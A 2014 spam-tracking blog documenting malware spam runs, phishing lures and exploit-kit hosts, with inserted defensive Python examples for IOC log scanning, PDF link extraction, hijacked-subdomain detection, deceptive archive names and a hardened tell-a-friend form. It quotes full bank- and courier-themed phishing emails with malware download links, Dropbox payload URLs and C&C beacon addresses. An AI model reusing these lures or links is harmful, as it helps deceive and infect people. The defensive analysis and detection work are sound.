Thursday 9 October 2014
Nuclear EK active on 178.79.182.106
It looks like the Nuclear exploit kit is active on 178.79.182.106 (Linode, UK), using hijacked subdomains of legitimate domains that use AFRAID.ORG nameservers. I can see the following sites active on that IP:
fuhloizle.tryzub-it.co.uk
fuhloizle.pgaof39.com
fuhloizle.cusssa.org
"fuhloizle" is a pretty distinctive search string to look for in your logs. It looks like the bad sites might be down at the moment (or the kit is hardened against analysis), but blocking this IP address as a precaution might be a good idea.
Labels: Linode, Malware, Nuclear EK, Viruses
Wednesday 8 October 2014
Malware spam: Lloyds "Important - Commercial Documents" and NatWest "You have a new Secure Message"
There's a familiar pattern to this malware-laden spam, but with an updated payload from before:
The link in the email runs through a script which will attempt to download a ZIP file pdf-to-view_864129_pdf.zip onto the target machine which in turn contains a malicious executable pdf-to-view_864129_pdf.exe which has a VirusTotal detection rate of 6/53.
The Malwr report indicates that the malware phones home to the following locations which are worth blocking, especially 94.75.233.13 (Leaseweb, Netherlands) which looks like a C&C server.
94.75.233.13:37400/0810uk1/HOME/0/51-SP3/0/
94.75.233.13:37400/0810uk1/HOME/1/0/0/
94.75.233.13:37400/0810uk1/HOME/41/5/1/
cemotrans.com/seo/0810uk1.soa
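The indicators in this post, the "fuhloizle" label and IP from the Nuclear EK post above, and the 30 September NatWest/fax beacons further down (which have the same path shape) are exactly the sort of thing to sweep proxy logs for. The following is an added example, not code from this blog, that matches a small IOC set against constructed proxy log lines. The log format, the sample lines and the generalised beacon-path regex are my assumptions, not something the posts state.

```python
import re
from urllib.parse import urlsplit

# Indicators quoted in the posts: IPs, a distinctive hostname label, a C&C domain.
BAD_IPS = {"178.79.182.106", "94.75.233.13", "188.165.198.52"}
BAD_HOST_LABELS = {"fuhloizle"}
BAD_HOSTS = {"cemotrans.com"}
# Beacon path shape generalised from /0810uk1/HOME/0/51-SP3/0/ and
# /3009uk1/NODE01/1/0/0/ (my assumption, not something the posts state).
BEACON_PATH = re.compile(r"^/\d{4}uk\d+/[A-Z0-9]+/\d+/[0-9A-Za-z-]+/\d+/$")


def classify(url):
    """Return the indicator names that match this URL (empty list means clean)."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower()
    hits = []
    if host in BAD_IPS:
        hits.append("ip:" + host)
    if host in BAD_HOSTS:
        hits.append("host:" + host)
    for label in host.split("."):
        if label in BAD_HOST_LABELS:
            hits.append("label:" + label)
    if BEACON_PATH.match(parts.path):
        hits.append("beacon-path")
    return hits


def scan(lines):
    """Scan constructed proxy log lines of the form '<ts> <client> <method> <url> <status>'.

    Returns (client, url, hits) for every line that matches at least one indicator.
    """
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue   # skip malformed lines rather than abort the whole sweep
        client, url = fields[1], fields[3]
        hits = classify(url)
        if hits:
            findings.append((client, url, hits))
    return findings


# Constructed sample log: two clean lines, one EK landing, one C&C beacon.
SAMPLE_LOG = [
    "2014-10-09T10:01:02 10.0.0.5 GET http://www.example.com/index.html 200",
    "2014-10-09T10:01:03 10.0.0.5 GET http://fuhloizle.pgaof39.com/ 200",
    "2014-10-08T11:20:14 10.0.0.9 POST http://94.75.233.13:37400/0810uk1/HOME/0/51-SP3/0/ 200",
    "2014-10-08T11:20:15 10.0.0.9 GET http://www.example.org/ 304",
]

if __name__ == "__main__":
    for client, url, hits in scan(SAMPLE_LOG):
        print(client, url, ",".join(hits))
```

The beacon-path regex is the useful part: the C&C IP changes between campaigns, but a client on your network fetching `/<ddmm>uk1/<node>/...` from a bare IP is worth a look even before the address turns up on a list.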
Lloyds Commercial Bank: "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@lloydsbank.com]
Date: 8 October 2014 11:09
Subject: Important - Commercial Documents
Important account documents
Reference: C437
Case number: 66324010
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file)
----------------------
http://01silex.com/dropbox/document.php
-----------------------
Please note that the Terms and Conditions available below are the Bank's most recently issued versions. Please bear in mind that earlier versions of these Terms and Conditions may apply to your products, depending on when you signed up to the relevant product or when you were last advised of any changes to your Terms and Conditions. If you have any questions regarding which version of the Terms and Conditions apply to your products, please contact your Relationship Manager. .
Yours faithfully
James Vance
Senior Manager, Lloyds Commercial Banking
Calls may be monitored or recorded in case we need to check we have carried out your instructions correctly and to help improve our quality of service.
Please remember we guarantee the security of messages sent by email.
NatWest: "You have a new Secure Message - file-2620"
From: NatWest [secure.message@natwest.com]
Date: 8 October 2014 10:29
Subject: You have a new Secure Message - file-2620
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
Please download your ecnrypted message at:
http://cookierunid.com/dropbox/document.php
(Google Disk Drive is a file hosting service operated by Google, Inc.)
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the NatWest Bank Secure Email Help Desk at 0131 556 3068.
Tuesday 7 October 2014
DHL-themed phish goes to a lot of effort and then spoils it with Comic Sans
This DHL-themed phish is trying to harvest email credentials, but instead of just spamming out a link, it spams out a PDF file with the link embedded in it.
Look closely at the blurb at the bottom and it confuses DHL with UPS, but who reads that? Attached is a non-malicious PDF file DHL (1).pdf which contains a link to the phishing site.
So far, so professional. And a neat trick to use PDF files in this way, as a lot of spam filters and anti-phishing tools won't spot it. The link in the PDF goes to 37.61.235.199/~zantest/doc1/dhlweb0002/webshipping_dhl_com_members_modulekey_displaycountrylist_id5482210003804452/DHL/index.htm where there is a rather less professional-looking webpage that is phishing for general email credentials rather than DHL credentials.
With the grotty graphics and injudicious use of Comic Sans, it's hard to see how this would fool anyone into turning over their credentials... but presumably they manage to harvest enough usernames and passwords to make it worthwhile.
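Because the link lives inside the PDF rather than the message body, a filter has to look inside the attachment. The following is an added example (not code from this blog) that pulls /URI actions out of an uncompressed PDF and scores each one. The minimal PDF is constructed here around the phishing URL quoted above plus a benign dhl.com link and a hex-encoded example.com link; the brand table is an assumption.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# /URI followed by a literal string "(...)" (with backslash escapes) or a hex string "<...>".
URI_RE = re.compile(rb"/URI\s*(?:\(((?:\\.|[^\\)])*)\)|<([0-9A-Fa-f\s]*)>)")
# Brands whose name in a link should only appear under the brand's own domain (assumption).
BRAND_DOMAINS = {"dhl": "dhl.com", "ups": "ups.com"}


def _unescape(raw):
    """Decode PDF literal-string escapes (escaped parens, backslash, n/r/t, octal ddd)."""
    out = bytearray()
    i = 0
    while i < len(raw):
        c = raw[i]
        if c == 0x5C and i + 1 < len(raw):          # backslash
            nxt = raw[i + 1]
            if 0x30 <= nxt <= 0x37:                  # up to three octal digits
                j = i + 1
                while j < len(raw) and j < i + 4 and 0x30 <= raw[j] <= 0x37:
                    j += 1
                out.append(int(raw[i + 1:j], 8) & 0xFF)
                i = j
                continue
            out.append({0x6E: 0x0A, 0x72: 0x0D, 0x74: 0x09}.get(nxt, nxt))
            i += 2
            continue
        out.append(c)
        i += 1
    return out.decode("latin-1")


def extract_uris(pdf_bytes):
    """All /URI targets in document order. Sees only uncompressed objects (see note below)."""
    uris = []
    for literal, hexstr in URI_RE.findall(pdf_bytes):
        if hexstr:
            digits = re.sub(rb"\s+", b"", hexstr).decode("ascii")
            if len(digits) % 2:
                digits += "0"                        # PDF pads an odd final hex digit with 0
            uris.append(bytes.fromhex(digits).decode("latin-1"))
        else:
            uris.append(_unescape(literal))
    return [u for u in uris if u]


def assess(url):
    """Reasons a link looks like phishing rather than the brand's own site (empty = nothing odd)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reasons = []
    try:
        ipaddress.ip_address(host)
        reasons.append("ip-literal-host")
    except ValueError:
        pass
    if "~" in parts.path:
        reasons.append("user-home-path")            # ~user paths usually mean a shared or hacked box
    for brand, domain in BRAND_DOMAINS.items():
        if brand in url.lower() and host != domain and not host.endswith("." + domain):
            reasons.append("brand-in-link-not-host:" + brand)
    return reasons


# The URL from the phishing PDF described in the post.
PHISH_URL = ("http://37.61.235.199/~zantest/doc1/dhlweb0002/webshipping_dhl_com_members_"
             "modulekey_displaycountrylist_id5482210003804452/DHL/index.htm")

# Constructed minimal PDF: three link annotations, one of them with a hex-string URI.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R 5 0 R 6 0 R] >> endobj\n"
    b"4 0 obj << /Type /Annot /Subtype /Link /Rect [72 700 300 720] /A << /S /URI /URI ("
    + PHISH_URL.encode("ascii") +
    b") >> >> endobj\n"
    b"5 0 obj << /Type /Annot /Subtype /Link /Rect [72 650 300 670] "
    b"/A << /S /URI /URI (http://www.dhl.com/en/express/tracking.html) >> >> endobj\n"
    b"6 0 obj << /Type /Annot /Subtype /Link /Rect [72 600 300 620] "
    b"/A << /S /URI /URI <687474703a2f2f6578616d706c652e636f6d2f> >> >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for uri in extract_uris(SAMPLE_PDF):
        print(uri, assess(uri) or "ok")
```

Two caveats: PDF 1.5+ files usually keep annotation dictionaries inside FlateDecode'd object streams, so a real gateway filter must inflate those first (this example deliberately scans the raw bytes only), and an attacker can put the link in a JavaScript action or an image overlay instead of a /Link annotation, so treat a clean result as "nothing found", not "safe".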
Date: 6 October 2014 23:32
Subject: Package has been sent.
Your shipment(s) listed below is scheduled for delivery on Thursday next week.
Scheduled Delivery Date: Thursday, 10/09/2014
Shipment 2
Shipper: ADIHASAN GROUP
Kindly please see attached file for shipment /delivery details and tracking procedure. You can also request a delivery change (e.g. reschedule or reroute) from the tracking detail.
Approximate Delivery Time: between 3:00 PM and 7:00 PM
DHL Service: DHL 2nd Day Air
We are pleased to provide you with delivery that fits your life.
© 2014 Parcel Service of the World. DHL, the DHL brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
All trademarks, trade names, or service marks that appear in connection with UPS's services are the property of their respective owners.
For more information on DHL's privacy practices, refer to the DHL Privacy Notice.
Please do not reply directly to this e-mail. DHL will not receive any reply message.
For questions or comments, visit Contact DHL.
This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
Privacy Notice
DHL My Choice Service Terms
Contact DHL
Friday 3 October 2014
"Thanks for shopping with us today!" malspam spreads via Dropbox
This spam email leads to malware hosted on Dropbox:
The download file is Payment Details_52375.zip containing a malicious executable PAYMENT DETAILS.PDF .scr_56453.exe which has a VirusTotal detection rate of 5/55. At the moment, automated analysis tools [1] [2] [3] are inconclusive as to what it does.
UPDATE: it is also being distributed via
https://www.dropbox.com/s/9an3ggp98xu7ql5/Transaction_85523.zip?dl=1
https://www.dropbox.com/s/8uoheamseo98nse/Information_J90Z4.zip?dl=1
https://www.dropbox.com/s/fvogsazezmv00hw/Transaction_G287O.zip?dl=1
https://www.dropbox.com/s/42b7binqmk8auu9/Payment_Details_A0869.zip?dl=1
https://www.dropbox.com/s/okag3y2qtg12vg7/Payment_Details_R435C.zip?dl=1
In this case the download location is https://www.dropbox.com/s/7n4ib0ysqnzr4un/Payment%20Details_52375.zip?dl=1 although it is likely that there are others.
From: pghaa@pghaa.org
To: victim@victimdomain.com
Date: 3 October 2014 11:43
Subject: victim@victimdomain.com
Thanks for shopping with us today! Your purchase will be processed shortly.
ORDER DETAILS
Purchase Number: CTV188614791
Purchase Date: 7:38 2-Oct-2014
Customer Email: victim@victimdomain.com
Amount: 4580 US Dollars
Open your payment details
Please click the link provided above to get more details about your order.
Thursday 2 October 2014
Sky doesn't understand "opting out" of marketing emails
Are you making the most of your Sky TV?
We’re checking our records and can see that you’re not currently opted in to get offers by email, so there are bound to be things you’re not hearing about, like:
- exclusive money-saving offers on fantastic Sky products and services
- the chance to trial our most popular products and services totally free
We’ll also donate £2 to Sky Rainforest Rescue, our partnership with WWF, for every customer that opts in – up to £10,000. Sky Rainforest Rescue is helping to save 1 billion trees in the Amazon. So you’ll be making a real difference to the rainforest, which is home to an astonishing one in 10 of all the wild species on Earth.
It only takes a minute, so opt in today and get more out of being a Sky customer.
Sky seem aghast that I'm not interested in a stream of marketing emails for products which I am probably not interested in. Which is why I opted out of having them. I don't want to be nagged about opting out - that's not honouring the opt out is it? In other words.. this is spam.
Just in case Sky ever ends up reading it, I will put it in terms that you might understand..
Wednesday 1 October 2014
uktservices.com "Booking Cancellation" spam / 37.235.56.121
I just had a mass of these purporting to be from uktservices.com ("UK Travel Services"), but in fact it is a forgery and does not come from them at all - they are not responsible for sending the spam and their systems have not been compromised.
The links in the emails I have seen so far go to:
[donotclick]vinafruit.com/ongo.html
[donotclick]famdebaere.eu/ongo.html
[donotclick]ebook-55.ebook-55.com/ongo.html
[donotclick]farahenterprises.com/ongo.html
In all cases, those pages forward to a malicious page at:
[donotclick]37.235.56.121:8080/njslfxqqw9
The IP of 37.235.56.121 belongs to EDIS GmbH in Austria, and I suspect it has been hacked through an insecure Joomla installation.
I haven't been able to identify which exploit kit it is as it has been hardened against analysis, but you can guarantee that this is malicious in some way or another.
All the emails are somewhat mangled, but the first link in the email (not the uktservices.com link) goes to what appears to be an exploit kit:
From: email@uktservices.com
Date: 1 October 2014 14:01
Subject: Booking Cancellation
Hello.
Your booking at 13:15 on 1st Oct 2014 has been Cancelled.
Here is a link to your updated bookings view:
< href="[redacted] ">http://www.uktservices.com/system/drivers/jobs/51/ 66c3a53705f1ea2c5b8a11c94c29c6 328599a0fc
Something evil on 87.118.127.230
Quite what exploit kit this is I cannot determine, but there's something evil on 87.118.127.230 (Keyweb, Germany) which is using hijacked GoDaddy-registered subdomains to distribute crap. It's definitely worth blocking this IP. The source looks like some sort of malvertising, but I have incomplete data.
The domains I have seen being abused are:
aacregistry.org
agostjoe.com
apprizse.com
association-connect.com
barnesvillechiro.com
bwclinic.com
chiro-connect.com
ctkblockparty.org
holyhoops.net
josephrobidoux.com
lifeatctk.org
mca-connect.com
midwestartists.org
missouritheater.com
missouritheater.net
missouritheater.org
missouritheatre.com
missouritheatre.net
missouritheatre.org
moveonedegree.com
mvsummerhoops.com
premiermortgagenetwork.info
rapidpricecomparison.com
robidouxrow.com
smallbiz-connect.com
staffing-connect.com
stjoarts.org
stjoearts.com
trailswest.org
tumainiag.com
tumainiag.org
vpmspecialists.com
A list of all the subdomains I have seen can be found here [pastebin]
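The tell-tale here, as with the afraid.org case on 9 October, is a crop of subdomains under unrelated legitimate apex domains all landing on one IP that the apexes themselves never use. The following is an added example (not the blog's own tooling) of finding that pattern in passive DNS data. The records are constructed (192.0.2.0/24 and 203.0.113.0/24 addresses and throwaway labels stand in for the real ones), and the two-level suffix table is a stand-in for the Public Suffix List.

```python
from collections import defaultdict

# Tiny stand-in for the Public Suffix List (assumption; use the real list in production).
TWO_LEVEL_SUFFIXES = {"co.uk", "org.uk", "com.au", "id.au"}


def apex(hostname):
    """Registrable domain: example.com, or tryzub-it.co.uk under a two-level suffix."""
    labels = hostname.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LEVEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def find_hijacked_subdomains(records, min_apexes=3, known_bad=frozenset()):
    """records: iterable of (hostname, ip) pairs from passive DNS or zone exports.

    A subdomain is reported when it resolves somewhere its own apex (or www.) never does,
    and that address is either on the known-bad list or is shared by subdomains of at
    least min_apexes unrelated apex domains (the fan-in that gives away a bulk hijack).
    Returns a sorted list of (hostname, ip, reason).
    """
    records = [(h.lower().rstrip("."), ip) for h, ip in records]
    apex_ips = defaultdict(set)    # apex -> addresses the site itself uses
    ip_apexes = defaultdict(set)   # address -> apex domains with any name on it
    for host, ip in records:
        a = apex(host)
        ip_apexes[ip].add(a)
        if host in (a, "www." + a):
            apex_ips[a].add(ip)
    findings = set()
    for host, ip in records:
        a = apex(host)
        if host in (a, "www." + a) or ip in apex_ips[a]:
            continue   # the site itself, or a subdomain living where the site lives
        if ip in known_bad:
            findings.add((host, ip, "known-bad-ip"))
        elif len(ip_apexes[ip]) >= min_apexes:
            findings.add((host, ip, "shared-by-%d-apexes" % len(ip_apexes[ip])))
    return sorted(findings)


# Constructed records: apexes from the list above on their own (documentation-range)
# addresses, throwaway subdomain labels parked on 87.118.127.230, a legitimate CDN
# subdomain that must not be flagged, and the afraid.org case from 9 October.
SAMPLE_RECORDS = [
    ("aacregistry.org", "192.0.2.10"), ("www.aacregistry.org", "192.0.2.10"),
    ("bwclinic.com", "192.0.2.11"), ("mail.bwclinic.com", "192.0.2.11"),
    ("cdn.bwclinic.com", "203.0.113.5"),
    ("chiro-connect.com", "192.0.2.12"),
    ("qx7f1.aacregistry.org", "87.118.127.230"),
    ("p0k3m.bwclinic.com", "87.118.127.230"),
    ("zz91a.chiro-connect.com", "87.118.127.230"),
    ("tryzub-it.co.uk", "192.0.2.20"),
    ("fuhloizle.tryzub-it.co.uk", "178.79.182.106"),
]

if __name__ == "__main__":
    for host, ip, reason in find_hijacked_subdomains(SAMPLE_RECORDS, known_bad={"178.79.182.106"}):
        print(host, ip, reason)
```

The fan-in rule is what lets this catch the next hosting IP before anyone has blacklisted it: a CDN or mail provider will also serve subdomains of many apexes, so in practice you keep an allowlist of such providers and tune `min_apexes` against your own data.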
"Homicide Suspect - important" spam
Ohmigod, the New York City police have finally tracked me down for eviscerating that spammer in Times Square.
Perhaps the biggest anomaly is the file that is downloaded, a ZIP file called file-viewonly7213_pdf.zip which contains an executable file-viewonly7213_pdf.scr which is (as you might guess) malicious with a VirusTotal detection rate of 2/55. The Anubis report shows that the malware phones home to santace.com which is probably worth blocking or monitoring. Other analyses are pending.
I've also seen the same payload promoted through a "You've received a new fax" spam, and no doubt there will be others during the course of the day.
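Both this payload (file-viewonly7213_pdf.scr inside a ZIP) and the Dropbox one from 3 October (PAYMENT DETAILS.PDF .scr_56453.exe) rely on a document-looking name in front of an executable extension. As an added example that is not part of the original posts, the following builds a ZIP in memory from those names with placeholder contents (no real malware) and shows the checks a mail gateway can apply to each member: executable extension, document word in the stem, whitespace before a dot, and an MZ header regardless of what the extension claims.

```python
import io
import re
import zipfile

EXECUTABLE_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".jse",
                  ".vbs", ".wsf", ".cpl", ".jar"}
DOCUMENT_WORDS = {"pdf", "doc", "docx", "xls", "xlsx", "rtf", "txt", "jpg", "jpeg"}


def name_reasons(member_name):
    """Reasons a file name inside an archive looks deceptive (empty list = nothing odd)."""
    base = member_name.replace("\\", "/").rsplit("/", 1)[-1]
    lower = base.lower()
    dot = lower.rfind(".")
    ext = lower[dot:] if dot >= 0 else ""
    stem = lower[:dot] if dot >= 0 else lower
    reasons = []
    if ext in EXECUTABLE_EXT:
        reasons.append("executable-extension")
        # "pdf-to-view_864129_pdf.exe": the stem is dressed up as a document.
        tokens = set(re.split(r"[^a-z0-9]+", stem))
        if tokens & DOCUMENT_WORDS:
            reasons.append("document-lookalike")
    if re.search(r"\s\.", base):
        reasons.append("whitespace-before-dot")     # "DETAILS.PDF .scr" pushes the real extension out of view
    return reasons


def inspect_zip(data):
    """Map each member name to its reasons; adds 'pe-header' when the content starts with MZ."""
    result = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = name_reasons(info.filename)
            with zf.open(info) as fh:
                if fh.read(2) == b"MZ":             # DOS/PE magic, whatever the name says
                    reasons.append("pe-header")
            result[info.filename] = reasons
    return result


def build_sample_zip():
    """Constructed sample: names from the posts with placeholder contents, not real malware."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("PAYMENT DETAILS.PDF .scr_56453.exe", b"MZ\x90\x00" + b"\x00" * 60)
        zf.writestr("statement.pdf", b"MZ\x90\x00" + b"\x00" * 60)   # innocent name, PE content
        zf.writestr("invoice.pdf", b"%PDF-1.4\n%%EOF\n")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in inspect_zip(build_sample_zip()).items():
        print(repr(name), reasons or "clean")
```

The `pe-header` check is the one that survives renaming games: a gateway that only looks at extensions is beaten by the next trick (a .scr renamed to .pdf and launched by a second stage, or an archive format the filter does not unpack), whereas the first two bytes of the member are what Windows will actually act on.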
Weirdly, the message comes from a police.uk email address and the link goes to a driving school in Australia. And it comes from 63.234.220.114 which is an IP address in Kansas City.
From: ALERT@police.uk [ALERT@police-uk.com]
Date: 1 October 2014 08:49
Subject: Homicide Suspect - important
Bulletin Headline: HOMICIDE SUSPECT
Sending Agency: New York City Police
Sending Location: NY - New York - New York City Police
Bulletin Case#: 14-49627
Bulletin Author: BARILLAS #1264
Sending User #: 56521
APBnet Version: 852065
The bulletin is a pdf file. To download please follow the link below (Google Disk Drive service):
http://lppdrivingschool.id.au/ib1/cc141713
The Adobe Reader (from Adobe.com) will display and print the bulletin best.
You can Not reply to the bulletin by clicking on the Reply button in your email software.
Tuesday 30 September 2014
Alzheimer's Association (act.alz.org) abused by spammers
The Alzheimer's Association in the US (alz.org) operate some sort of tell-a-friend system which is apparently easily abused by spammers.
Is this actually from Marbu Contracting? Well, they have been around for 35 years and have their own website at marbucontracting.co and receive emails at the domain marbu-contracting.com, so it is unlikely that they would either resort to using a Hotmail account or sending spam in this way.
So is it a scam? It could be a dangerous one as some Qatari firms have been accused of running slave labour camps, so there's a good chance that this gig isn't what it is supposed to be.
But either the Alzheimer's Association or their service provider Convio Inc must bear some of the responsibility for creating a system that can be abused by spammers in this way. Although their site is meant to restrict sending these messages to ten addresses at a time, presumably the bad guys are running a script or have found some other way to bulk email using alz.org.
In conclusion.. ignore this bogus job offer. And remember to secure this sort of "tell a friend" functionality on your own servers.
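As an added example of what securing a tell-a-friend form means in practice (example code, not anything from alz.org or Convio), the following keeps the message to a fixed template so no spammer-written text reaches the body, refuses "names" that smuggle in an address or link, never sets Reply-To from user input, and enforces both a per-request recipient cap and a sliding one-hour cap per client so a script cannot simply repeat the ten-at-a-time request. Names, limits and the clock are assumptions.

```python
import re
import time
from collections import defaultdict, deque

EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")
# Anything that would let the "your name" field carry a link or contact address into the mail.
SMUGGLE_RE = re.compile(r"(https?://|www\.|@|\.(com|net|org|ru|biz)\b)", re.IGNORECASE)


class FakeClock:
    """Settable clock so the rate limit can be demonstrated without waiting an hour."""
    def __init__(self, now=0.0):
        self.now = now

    def __call__(self):
        return self.now


class TellAFriend:
    def __init__(self, org_from, site_url, max_per_request=10, max_per_hour=20, clock=time.time):
        self.org_from = org_from
        self.site_url = site_url
        self.max_per_request = max_per_request
        self.max_per_hour = max_per_hour
        self.clock = clock
        self._sent = defaultdict(deque)   # client key -> send times inside the window

    def _clean_name(self, name):
        # CR/LF in the value would inject extra mail headers; collapse them and cap the length.
        name = re.sub(r"[\r\n\t]+", " ", name).strip()[:60]
        if not name or SMUGGLE_RE.search(name):
            raise ValueError("sender name must be a plain name, not an address or link")
        return name

    def _reserve(self, client_key, count):
        # Sliding one-hour window per client: the cap applies across requests, so looping
        # a ten-recipient request is stopped once max_per_hour addresses have been used.
        now = self.clock()
        window = self._sent[client_key]
        while window and window[0] <= now - 3600:
            window.popleft()
        if len(window) + count > self.max_per_hour:
            raise PermissionError("hourly recipient limit reached for %s" % client_key)
        window.extend([now] * count)

    def build_messages(self, client_key, sender_name, recipients):
        recipients = [r.strip() for r in recipients]
        if not 0 < len(recipients) <= self.max_per_request:
            raise ValueError("between 1 and %d recipients per request" % self.max_per_request)
        bad = [r for r in recipients if not EMAIL_RE.match(r)]
        if bad:
            raise ValueError("invalid recipient(s): " + ", ".join(bad))
        name = self._clean_name(sender_name)
        self._reserve(client_key, len(recipients))
        # Fixed template: the only user-supplied text that reaches the mail is the short name,
        # From is always the organisation, and Reply-To is never taken from the form.
        subject = "%s thinks you should visit %s" % (name, self.site_url)
        body = ("%s thought you might like to visit %s\n\n"
                "This message was sent through the tell-a-friend form and contains no text "
                "written by the sender.") % (name, self.site_url)
        return [{"from": self.org_from, "to": r, "reply_to": None,
                 "subject": subject, "body": body} for r in recipients]


if __name__ == "__main__":
    svc = TellAFriend("info@example.org", "https://example.org/")
    for msg in svc.build_messages("198.51.100.7", "Alice", ["bob@example.org"]):
        print(msg["to"], "|", msg["subject"])
```

The per-client key should be whatever you can actually hold a sender to (source IP plus a logged-in account where one exists); with the template fixed there is nothing for a spammer to gain from the form except a link to your own site, which removes the incentive that made the alz.org form worth scripting.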
The originating IP is 66.45.103.69 which closely matches the IP of 66.45.103.78 for act.alz.org mentioned in the email, so the email is genuinely coming via the Alzheimer's Association website from some scumbag spammers.
From: Marbu Contracting Company LLC. [info@alz.org]
Reply-To: "Marbu Contracting Company LLC." [marbu.constructions.ah@hotmail.com]
Date: 30 September 2014 19:33
Subject: Check out the Alzheimer's Association website!
Marbu Contracting Company LLC.
No.48,1st Floor,Kaamco
Building, Suhaim Bin Hamad
Street, Bin Mahmoud Qatar,
Tele:44204739.Fax:44289185
E-Mail:(marbu.constructions.ah@hotmail.com)
Marbu Contracting Company LLC. wish to use this medium to announce
that vacancies is now on for Qualified building contractors,
Structural Engineers/Electrical Engineer//Piping/Mechanical
Engineers/GIS/Land Surveyors,NDT Engineer, Civil Engineers, Project
Director,ETC. Candidates should have a Relevant degree B.Eng, BSc.
Eng or B racersTech,
interested contractor or candidate should apply with full resume and
details of jobs completed or ongoing for perusal.
Send You reply to:(marbu.constructions.ah@hotmail.com)
Regard's
Mr.Ahmed Haasen,
Human Resources Manager
I urge you to join me and visit the Alzheimer's Association today!
If the text above does not appear as a clickable link, you can visit the web address:
http://act.alz.org/site/TellAFriend?s_oo=F79cLz0Fs6dcX6iQ5Lb3TA
If you no longer wish to receive email messages sent from your friends on behalf of this organization, please click here or paste this URL into your browser: http://act.alz.org/site/TellFriendOpt?action=optout&toe=a136b421fe2a9b594f68767c21c537f6382420c25dbc7e041ccd4c50a5c00593
Malware spam: NatWest "You have a new Secure Message" / "You've received a new fax"
The daily mixed spam run has just started again, these two samples seen so far this morning:
UPDATE: the ThreatTrack report [pdf] shows that the malware attempts to communicate with the following locations:
188.165.198.52/3009uk1/NODE01/0/51-SP3/0/
188.165.198.52/3009uk1/NODE01/1/0/0/
188.165.198.52 is (unsurprisingly) allocated to OVH in France and is definitely worth blocking.
The link in the email goes through a script to ensure that you are using a Windows PC and then downloads a file document3009.zip which contains a malicious executable document3009.scr which has a VirusTotal detection rate of 3/54. The Comodo CAMAS report and Anubis report are rather inconclusive.
NatWest: "You have a new Secure Message"
From: NatWest [secure.message@natwest.com]
Date: 30 September 2014 09:58
Subject: You have a new Secure Message - file-3800
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
Please download your ecnrypted message at:
http://binuli.ge/docs/document0679
(Google Disk Drive is a file hosting service operated by Google, Inc.)
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the NatWest Bank Secure Email Help Desk at 0131 556 6002.
"You've received a new fax"
From: Fax [fax@victimdomain.com]
Date: 30 September 2014 09:57
Subject: You've received a new fax
New fax at SCAN4148711 from EPSON by https://victimdomain.com
Scan date: Tue, 30 Sep 2014 14:27:24 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at:
http://www.brianhomesinc.com/docs/document5928
(Google Disk Drive is a file hosting service operated by Google, Inc.)
Monday 29 September 2014
Malware spam: "Lloyds Commercial Bank" / "HSBC Bank UK"
Two different banking spams this morning, leading to the same malware.
The link in the email goes through a script and then downloads a file document_8641_29092014_pdf.scr (this time without a ZIP wrapper) which has a VirusTotal detection rate of just 1/55. The Anubis report shows that the malware attempts to phone home to cuscorock.com which is probably a good thing to block or monitor.
Lloyds Commercial Bank "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@lloydsbank.com]
Date: 29 September 2014 11:03
Subject: Important - Commercial Documents
Important account documents
Reference: C947
Case number: 18868193
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file)
----------------------
http://www.ticklestootsies.com/dropbox-documents/document_8641_29092014.php
-----------------------
Please note that the Terms and Conditions available below are the Bank's most recently issued versions. Please bear in mind that earlier versions of these Terms and Conditions may apply to your products, depending on when you signed up to the relevant product or when you were last advised of any changes to your Terms and Conditions. If you have any questions regarding which version of the Terms and Conditions apply to your products, please contact your Relationship Manager. .
Yours faithfully
James Vance
Senior Manager, Lloyds Commercial Banking
Calls may be monitored or recorded in case we need to check we have carried out your instructions correctly and to help improve our quality of service.
Please remember we guarantee the security of messages sent by email.
HSBC Bank UK "Payment Advice Issued"
From: HSBC Bank UK
Date: 29 September 2014 11:42
Subject: Payment Advice Issued
Your payment advice is issued at the request of our customer. The advice is for your reference only.
Please download your payment advice at http://sabiacommunications.com/dropbox-documents/document_8641_29092014.php
Yours faithfully,
Global Payments and Cash Management
*******************************************************************************
This is an auto-generated email, please DO NOT REPLY. Any replies to this email will be disregarded.
Sunday 28 September 2014
This is why I don't use Network Solutions
I recently acquired a domain name which ended up being registered at Network Solutions, not my usual registrar... so I then wanted to move that domain from NetSol to my main domain account. Now, to do this you need an authorisation code to transfer out... which I duly requested.
So after a few days of waiting, I get the following email from Network Solutions.
Let's look more closely at that authorization code. Yeah, normally that's the sort of thing that you should never share... but:
The authorisation code is frigging blank. This is meant to be an automated process... how can it be blank? Or has someone intervened manually?
Oh wait, I didn't read this line in the email:
